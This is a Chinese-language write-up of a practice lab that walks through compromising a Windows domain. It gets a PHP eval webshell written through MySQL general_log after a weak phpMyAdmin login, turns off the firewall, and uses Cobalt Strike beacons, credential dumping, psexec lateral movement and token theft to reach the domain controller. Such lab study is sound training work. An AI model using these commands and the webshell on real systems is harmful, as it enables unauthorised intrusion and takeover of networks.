前言
從靶機中學習內網域滲透知識
所需工具:nmap、burpsuite、cs
環境搭建
web服務器(Windows7)
- NAT模式:192.168.5.140
- VMnet1:192.168.52.143
域控服務器(Windows server 2008)
- VMnet1:192.168.52.138
域成員主機(Windows server 2003)
- VMnet1:192.168.52.141
外部攻擊
信息收集
主機發現
nmap -sn 192.168.5.0/24
端口掃描
nmap -sV -p- 192.168.5.140
訪問80端口,可以獲取網站的絕對路徑
目錄掃描
訪問phpmyadmin,使用root/root弱口令登錄
GetShell
查看是否可以寫入webshell
show global variables like '%secure%';
secure_file_priv 是用來限制 load dumpfile、into outfile、load_file() 函數在哪個目錄下擁有上傳或者讀取文件的權限
當 secure_file_priv 的值為 NULL ,表示限制 mysqld 不允許導入|導出
當 secure_file_priv 的值為 /tmp/ ,表示限制 mysqld 的導入|導出只能發生在 /tmp/ 目錄下
當 secure_file_priv 的值沒有具體值時,表示不對 mysqld 的導入|導出做限制
通過全局日志GetShell
SHOW VARIABLES LIKE '%general%';
general_log:日志開關
general_log_file:日志文件路徑
開啟日志,並修改日志文件路徑。這里的絕對路徑在80端口PHP探針獲取
set global general_log = on;
set global general_log_file='C:\\phpStudy\\WWW\\shell.php';
再次查看全局日志,日志已開啟並修改日志文件路徑
寫入shell
select '<?php eval($_POST[admin]);?>'
蟻劍連接shell
內網滲透
上線CS
CS 建立 Listener
CS 生成后門
使用蟻劍將后門上傳至web服務器
首先關閉防火牆 netsh advfirewall set allprofiles state off
蟻劍虛擬終端執行shell.exe,目標主機上線cs
目標主機信息收集
注:CS默認心跳值60s,調整心跳值為0,在生產環境中不要設置太低。Beacon:sleep 0
查看主機基本信息
whoami hostname net localgroup administrators systeminfo
ipconfig /all
ipconfig 查看內網地址和dns服務器
查看域信息
查看主域信息
查看時間服務器
查看當前登錄域
判斷域IP地址
查看域控和用戶信息
查看域成員計算機列表
查看域控制器
查看域管理員組
查看域密碼策略
橫向探測
內網主機發現
右鍵Beacon,進行端口掃描,cs會識別出所有的IP段
掃描完成后,在目標處,會列出探測到的存活主機
使用cs進行讀取密碼
在密碼憑證中,可以看到抓取的密碼
查看路由信息
橫向滲透
SMB Beacon
新建smb監聽
右鍵當前Beacon,派生一個會話
生成的子會話,在IP后面會有連接圖標
psexec 使用憑證登錄其它主機
在目標中,嘗試使用psexec登錄其它主機
在彈出的窗口中選擇使用 god.org 的 Administrator 的憑證信息,監聽器選擇剛才創建的 smb beacon,會話也選擇對應的 smb beacon 的會話
這樣,就得到了 ROOT-TVI862UBEH 這台主機的 beacon
token 竊取
選擇GOD/Administrator的令牌竊取
在psexec處,現在當前Token即可
查看cs會話列表,成功拿到域控服務器
最終視圖效果
